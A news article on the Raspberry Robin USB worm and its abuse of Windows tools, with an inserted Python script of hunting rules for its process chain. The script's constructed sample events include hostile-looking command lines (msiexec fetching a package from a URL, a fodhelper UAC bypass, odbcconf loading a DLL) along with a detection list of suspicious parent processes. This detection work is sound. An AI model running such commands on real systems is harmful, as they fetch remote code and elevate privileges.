Microsoft discovered a Windows worm in the networks of hundreds of organizations from various industries.
The malware, called Raspberry Robin, spreads via infected USB devices and was first detected in September 2021 by Red Canary analysts.
The security company Sekoia found the same worm using QNAP NAS devices as command and control (C2) servers in early November [PDF], while Microsoft said it found malicious packages linked to this worm dating back to 2019.
Redmond's findings are very much in line with those of Red Canary's Detection Engineering team, which also detected this worm in several of its customers' networks.
Although Microsoft observed the malware connecting to addresses on the Tor network, the attackers have not yet acted on the access they already hold on their victims' machines.
The malware can bypass User Account Control (UAC) on infected systems by abusing legitimate Windows tools.
As we already mentioned, Raspberry Robin spreads to Windows systems via infected USB drives containing a malicious .LNK file.
Once the USB device is connected and the user clicks the link, the worm uses cmd.exe to spawn an msiexec process that launches a malicious file stored on the infected USB.
It infects new Windows devices, communicates with command and control (C2) servers, and runs malicious payloads using legitimate Windows utilities:
- fodhelper (a trusted, auto-elevating Windows executable used to manage optional features),
- msiexec (the Windows Installer command-line tool),
- and odbcconf (a tool for configuring ODBC drivers).
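Hunting rules for the execution chain just described (cmd.exe spawning msiexec, plus fodhelper and odbcconf use), as an added example that is not part of the original article or of any Microsoft, Red Canary or Sekoia report. It assumes process-creation telemetry such as Sysmon Event ID 1 normalised into the ProcEvent records below; the sample events are constructed for illustration, not captured indicators. The msiexec-from-URL rule and the list of suspicious fodhelper parents are hunting heuristics chosen here, not indicators the vendors published.

```python
"""Process-lineage hunting rules for the Raspberry Robin execution chain.

Added example for this article; it is not Microsoft's, Red Canary's or Sekoia's
code. It assumes process-creation telemetry (Sysmon Event ID 1 or an EDR
equivalent) has been normalised into the ProcEvent records below. The sample
events are constructed for illustration, not captured from a real infection.
"""
from dataclasses import dataclass
import re


@dataclass(frozen=True)
class ProcEvent:
    ts: str             # ISO timestamp (constructed)
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    cmdline: str        # command line of the created process


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' if path is empty)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


_URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Shells and LOLBins that should not normally be the parent of fodhelper.exe,
# which Settings launches via explorer.exe. Heuristic list, an assumption here.
_SCRIPT_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                   "cscript.exe", "rundll32.exe", "msiexec.exe", "mshta.exe"}


def cmd_spawns_msiexec(e: ProcEvent) -> bool:
    """The article's chain: cmd.exe creating an msiexec process."""
    return _basename(e.image) == "msiexec.exe" and _basename(e.parent_image) == "cmd.exe"


def msiexec_remote_package(e: ProcEvent) -> bool:
    """msiexec installing straight from a URL (heuristic for C2 package fetches)."""
    return _basename(e.image) == "msiexec.exe" and _URL_RE.search(e.cmdline) is not None


def fodhelper_from_script(e: ProcEvent) -> bool:
    """fodhelper.exe (an auto-elevating binary) launched by a shell or LOLBin."""
    return (_basename(e.image) == "fodhelper.exe"
            and _basename(e.parent_image) in _SCRIPT_PARENTS)


def odbcconf_loads_code(e: ProcEvent) -> bool:
    """odbcconf.exe /A {REGSVR dll} or /F file.rsp loads attacker-supplied code."""
    if _basename(e.image) != "odbcconf.exe":
        return False
    c = e.cmdline.lower()
    return "regsvr" in c or re.search(r"/f\s+\S+\.rsp", c) is not None


RULES = {
    "cmd_spawns_msiexec": cmd_spawns_msiexec,
    "msiexec_remote_package": msiexec_remote_package,
    "fodhelper_from_script": fodhelper_from_script,
    "odbcconf_loads_code": odbcconf_loads_code,
}


def detect(events):
    """Return (rule_name, timestamp) pairs for every event that trips a rule."""
    return [(name, e.ts) for e in events for name, rule in RULES.items() if rule(e)]


SYS = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [  # constructed telemetry, not real IOCs
    ProcEvent("2022-07-01T09:00:01Z", SYS + "cmd.exe", "C:\\Windows\\explorer.exe",
              'cmd.exe /c "D:\\start.cmd"'),
    ProcEvent("2022-07-01T09:00:02Z", SYS + "msiexec.exe", SYS + "cmd.exe",
              "msiexec /q /i http://example.invalid/pkg.msi"),
    ProcEvent("2022-07-01T09:00:05Z", SYS + "fodhelper.exe", SYS + "cmd.exe",
              "fodhelper.exe"),
    ProcEvent("2022-07-01T09:00:06Z", SYS + "odbcconf.exe", SYS + "msiexec.exe",
              "odbcconf.exe /S /A {REGSVR C:\\Users\\Public\\t.dll}"),
    # benign: a user double-clicking a downloaded installer
    ProcEvent("2022-07-01T10:15:00Z", SYS + "msiexec.exe", "C:\\Windows\\explorer.exe",
              'msiexec /i "C:\\Users\\alice\\Downloads\\tool.msi"'),
    # benign: odbcconf run interactively with no load directive
    ProcEvent("2022-07-01T10:20:00Z", SYS + "odbcconf.exe", "C:\\Windows\\explorer.exe",
              "odbcconf.exe"),
]

if __name__ == "__main__":
    for rule, ts in detect(SAMPLE_EVENTS):
        print(f"{ts}  {rule}")
```

Run as a script it prints one line per hit; the two benign events produce none. The parent-process list for fodhelper should be tuned to what launches it in your environment, and the odbcconf rule keys on the two documented code-loading switches (/A with REGSVR, and /F with a response file) rather than on any particular file name.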
The security researchers who discovered Raspberry Robin have not yet identified its origin and are still looking for the developers' digital footprints.
Microsoft has already labeled this campaign "high risk," since the attackers can download and deploy additional malware on their victims' networks and could begin causing damage at any time.